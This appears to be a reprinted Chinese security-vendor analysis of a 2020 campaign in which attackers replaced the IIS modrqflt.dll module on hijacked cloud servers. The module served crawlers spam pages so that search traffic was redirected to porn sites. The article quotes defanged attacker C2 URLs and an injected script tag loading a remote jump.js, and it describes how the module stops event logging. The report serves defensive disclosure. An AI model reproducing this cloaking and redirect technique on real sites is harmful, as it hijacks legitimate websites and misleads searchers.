您的位置:首页 > 互联网

企业官网惨变色情网站,360安全大脑独家揭秘幕后骗局

发布时间:2020-09-18 00:00:00  来源:互联网     背景:

  互联网信息服务(Internet Information Services)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务,大多数Windows系统服务器均有安装,常用来运行Web服务。而当这一底层架构被恶意黑客盯上,网络威胁自然随之而来。

1600395737319698.jpg

  近日,360安全大脑独家发现一新型恶意模块,被黑客植入其攻陷的IIS WEB服务器,并利用该恶意模块替换IIS服务中的一个服务组件,躲避检测查杀。经360安全大脑分析,本次攻击事件最早开始于2020年8月,黑客攻陷数个知名云服务提供商的数十台服务器,受影响网站数量高达几千例,360安全大脑第一时间发出紧急安全预警。

  攻陷公用云主机服务器,“染毒蜘蛛”过境数千网站

  360安全大脑分析发现,被攻击服务器主要为公用云主机服务器,且通常黑客攻陷一个公用云主机服务器后,即可直接获得几十甚至上百个网站的控制权,其中不乏企业官网。360安全大脑监测数据显示,此次遭攻击服务器高达数十台,几千个网站受波及。

1600395748639877.jpg

  (部分受害企业)

  鉴于上述情况,360安全大脑第一时间对样本展开分析,随后发现黑客在攻陷目标服务器后,会从网上下载一个包含db.db、dd.cc、e.cc模块、x64.dd、x86.dd五个文件的恶意压缩包,各文件功能具体如下:

  db.db 是一个SQLite3数据库文件。主要包含恶意模块需要的网站模版及关键字等信息,此文件后续会被写入IIS目录下的inetsrv\modrqflt.dll:db.db文件中,这是一个拥有FILE_ATTRIBUTE_INTEGRITY_STREAM属性的文件,在目录下不可见。

  dd.cc是黑客开发的恶意模块安装工具。黑客使用该工具可改变modrqflt.dll的访问控制权限(DACL),从而成功将modrqflt.dll重命名为cache.dll,并将恶意程序改名为modrqflt.dll。

  e.cc模块是用来停止被攻陷服务器日志记录的功能。运行之后,其会遍历线程找到Eventlog服务的线程并停止,以此来停止日志记录的功能。

  x64.dd为黑客编写的64位恶意modrqflt.dll,主要用来替换C:\Windows\System32\inetsrv下iis服务器自带的modrqflt.dll。

  x86.dd 则是黑客编写的32位恶意modrqflt.dll,主要用来替换C:\Windows\SysWOW64\inetsrv下的modrqflt.dll。

图片3.jpg

  (黑客攻陷目标服务器后下载的恶意压缩包)

  modrqflt.dll是提供请求过滤处理(Request filtering handler)的功能模块,而成功替换后,黑客便可以过滤掉网站正常访问请求,专门为搜索引擎蜘蛛(爬虫)提供色情素材。

1600395766271783.jpg

  完成恶意模块的替换后,当搜索引擎蜘蛛(爬虫)访问网站原本失效链接时,此模块即会生成一个包含大量链接的“空白”页面,并将HTTP响应码由404改为200来欺骗“蜘蛛”(爬虫)。而“蜘蛛”在获取该页面后,会继续访问页面中的所有链接,并抽取关键字存入搜索数据库。此时,如果有用户搜索对应关键词,就会返回上述伪造链接及页面,如果恶意DLL仍然存在,则会直接跳转到色情网站。

  空白页面神隐“透明”网址,骗过爬虫蜘蛛猖狂搞颜色

  404页面并不少见,通常是由于服务器地址变动,或者维护不到位等因素导致网站个别链接失效。正常情况下,当搜索引擎蜘蛛爬取时遇到此类链接,也会显示404页面,但对于遭遇黑客攻陷的网站来说,其失效链接则会骗过“蜘蛛”,显示空白页面却在源码中暗藏大量链接。

1600395780925655.jpg

  看到这里你或许会有疑问,中招的网站怎么区分正常的用户和爬虫呢?其实当用户使用浏览器打开一个网站,浏览器向网站服务器发出请求时,会在请求数据头部设置一个User-Agent的字段,例如访问百度时:

1600395791837741.jpg

  

  而当搜索引擎爬取时,User-Agent设置的则有一些不一样:

  百度蜘蛛

  Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

  360蜘蛛:

  Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider

  神马蜘蛛:

  Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36

  搜狗蜘蛛:

  Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)

1600395801707225.jpg

  此次事件中,不法黑客下载的恶意模块会通过判断User-Agent区分用户和蜘蛛(爬虫),当识别为搜索引擎蜘蛛后,就会返回上述100条链接,其中前80条hostname是恶意模块生成的随机页面,与当前网站的hostname一致;后20条hostname则是其他受害网站生成的随机页面,均为接口hxxp://zjclasjsdknlnxsa.com:8081/ping返回(此接口需要特殊User-Agent才能访问)。

1600395813386349.jpg

  与此同时,100条随机生成的页面链接,看似杂乱无章其实暗藏一定规律的,它们的URL一般是由下图中的规则构成,即[]中的为可选。

1600395824740886.jpg

  参照上图的URL规则,观察随机链接中的path字段会发现,它们全都是以lista/xzs/api/bks开头,且以上四个关键词,分别对应了四套恶意模块使用网站模版。

图片10.jpg
1600395840798294.jpg

  在生成网页过程中,程序还会随机读取keyword等其他表中的数据,以此来替换网站模版中的对应留空位置。四套模版运行如下图所示:

1600395855902409.jpg

  上述网页显示内容,都是访问受害网址时数据库关键字替换随机生成的,搜索引擎蜘蛛(爬虫)则会将上述伪造的URL和页面缓存在数据库中。当用户在搜索引擎中搜索色情关键词,一旦命中上述伪造页面内容,那么搜索引擎就会返回上述伪造的URL和页面摘要。

  此时,如若用户点击页面网址,浏览器则会默认设置Referer字段,以此来标明是从那个链接找到当前的链接。恶意模块正是利用这一点,区分当前访问页面是否来自于百度/360/搜狗/神马等国内搜索引擎中的一种。

图片13.jpg

  特别是,如果接口hxxp://zjclasjsdknlnxsa.com:8081/jump有返回数据,则会设置页面的内容为接口返回的数据:

1600395878724041.jpg

  如若没有获取到接口数据,则会访问db.db数据库,将jump中的代码插入网页中:

        <script               type="text/javascript" 

        src="hxxp://zjclasjsdknlnxsa.com/js/jump.js"></script>

  jump.js内容如下:

1600395890782684.jpg

  上述代码的主要功能就是跳转到最终的色情网站:

图片16.jpg

  而当我们在某搜索引擎搜索受害网站关键词时,点击搜索的链接,打开的就是色情网址hxxps://2**sg.xyz/,虽然原网址完全是一个正规网站。

1600395906192339.jpg

  (搜索网址为色情网站)

1600395917895608.jpg

  (受害网站原网址为正规网站)

  黑灰产业链持续发酵,360安全大脑强势出击

  经360安全大脑研判分析,此次是黑灰产业链的持续性攻击事件,黑客团伙使用专业的渗透技术对各类网站进行攻击并植入木马,非法获取服务器控制权,并在随意管控攻陷的肉鸡服务器的基础上,利用搜索引流扩散色情诈骗内容,影响正规网站正常业务运行。

  现阶段,黑客团伙攻击仍在持续,广大用户应格外警惕,避免遭受不必要的损失。对此,360安全大脑给出如下安全建议:

  1、尽快前往weishi.360.cn,下载安装360安全卫士,有效拦截各类病毒木马攻击,保护电脑隐私及财产安全;

  2、注重服务器安全管理,规范安全等级保护工作,及时更新漏洞补丁;

  3、建立网站安全策略,防止攻击发生时危害进一步扩大。

1600395929960708.jpg

特别提醒:本网内容转载自其他媒体,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。


返回网站首页

本文评论
优刻得等百余位嘉宾齐聚厦门,共探新经济未来
近日,由厦门市政府主办,厦门市发展和改革委员会,厦门市工信局承办的2019厦门新经济大会在厦门成功......
日期:12-04
刚开年就搞大动作?中小企业复工前有必要看下这个
节流增效一直是每个企业的追求, 对于许多IT能力不足的中小规模的企业来说, 它们更需要利用......
日期:02-17
消费恢复趋势观察报告:五一奶茶店人气暴增,相比清明节客流翻倍!
国内新冠疫情防控成效显著,经济秩序正逐步恢复,被暂停的线下消费场景已经重启。友盟+联合高德地图、......
日期:05-27
什么值得买会员体系再发力,提供多场景专属消费权益
9月10日,消费决策平台&ldquo;什么值得买&rdquo;会员体系福利再升级,主题活动&ldquo;寻找值会员&rd......
日期:09-12
ofo报废小黄车5元一辆
(原标题:北京ofo报废小黄车5元一辆,多地共享单车存量腰斩)...
日期:08-01
微信安卓版暗黑模式已灰度测试完毕,即将全量上线
3月22日消息 今天上午,微信 iOS版 迎来了 7.0.12 更新,正式加入对深色模式的支持。 微信 7.0.12 ......
日期:03-22
摩根大通分析师预测:台积电将提前获英特尔大单
9 月 11 日消息,据台湾媒体报道,摩根大通分析师昨日发布报告预测,台积电将提前获英特尔大单。...
日期:09-11
ISC2020关键信息基础设施安全防护论坛:构建安全防护体系,立足顶层设计开启“合规之路”
纵观全球,随着信息化和全球经济化相互促进,"万物互联"时代已来,无处不在的计算和设备,串联起物......
日期:08-05
民建企业家协会会长李光荣先生爱心捐助五道营乡贫困群众
6月11日-12日,民建江西省委一行到五道营乡开展对口帮扶工作,一行人先后考察了长胜堡村金莲花加工扶......
日期:09-11
饿了么登上三楼,用数字化升级本地生活服务行业
服务是&ldquo;互联网+&rdquo;带来的必然产物,它的实现主要依靠O2O模式,即Online To Offline(在线......
日期:12-25
618热水器怎么选?万和倾情推荐“真香”热水器
一年一度的618就要来了,想买热水器却不知道怎么挑选的朋友,这边给大家推荐一款&ldquo;真香&rdquo;......
日期:06-09
聚焦AI教育领域,方直科技推出英语AI互动课堂——LinKid柠课英语
在&ldquo;COVID-19&rdquo;疫情下,大量学习需求涌入在线平台,K12在线教育平台共享优质教学资源的优......
日期:05-26
中信资本丨投身于多领域,战略布局多行业
近年来,随着中国经济实力的不断增强,市场上涌现了丰富的投资机会。中信资本凭借对中国营商环境及......
日期:05-15
2019世界物联网排行榜公布,国美智能进入全球排名100强
11月8日,2019世界物联网大会在京开幕。本届大会以&ldquo;推动5G物联世界 创造全球智慧经济&rdquo;......
日期:11-11
为战“疫”人员保驾护航 湖北1800余座中石化加油站支持小程序无接触服务
近日,湖北全省1800余座中石化加油站上线&ldquo;中石化加油湖北&rdquo;微信小程序,为逆风前行的湖......
日期:02-17
拿走不谢!《智能金融时代——银行业转型白皮书》发布
人工智能时代已经来临,在银行业,人工智能技术已经融入到哪些场景?银行业在转型过程中,如何拥抱科......
日期:04-26
天翼云使能每一个文创人 推动中国电影走向“黄金时代”
11 月19日,第28届金鸡百花电影节在厦门拉开帷幕,《流浪地球》、《我不是药神》、《风语咒》、《地......
日期:11-20
AI透明度引发关注 科技巨头推工具解释算法决策过程
北京时间9月27日消息,人工智能技术的透明度和道德伦理问题正引发越来越多的关注,这促使云计算服务......
日期:09-27
百度网盘6月清理色情违法等有害文件5万余个,封禁账号23万余个
7月18日,百度发布6月信息安全综合治理月报,向网民周知百度在处理网络虚假有害信息、保护网民权益......
日期:07-19
微联科技品牌升级 打造乐域平台推动域名产业焕发“第二春”
现在是网络时代,如果要问网络时代最重要的数字资产是什么?估计不同的人群会有不同的回答。回顾全球......
日期:11-11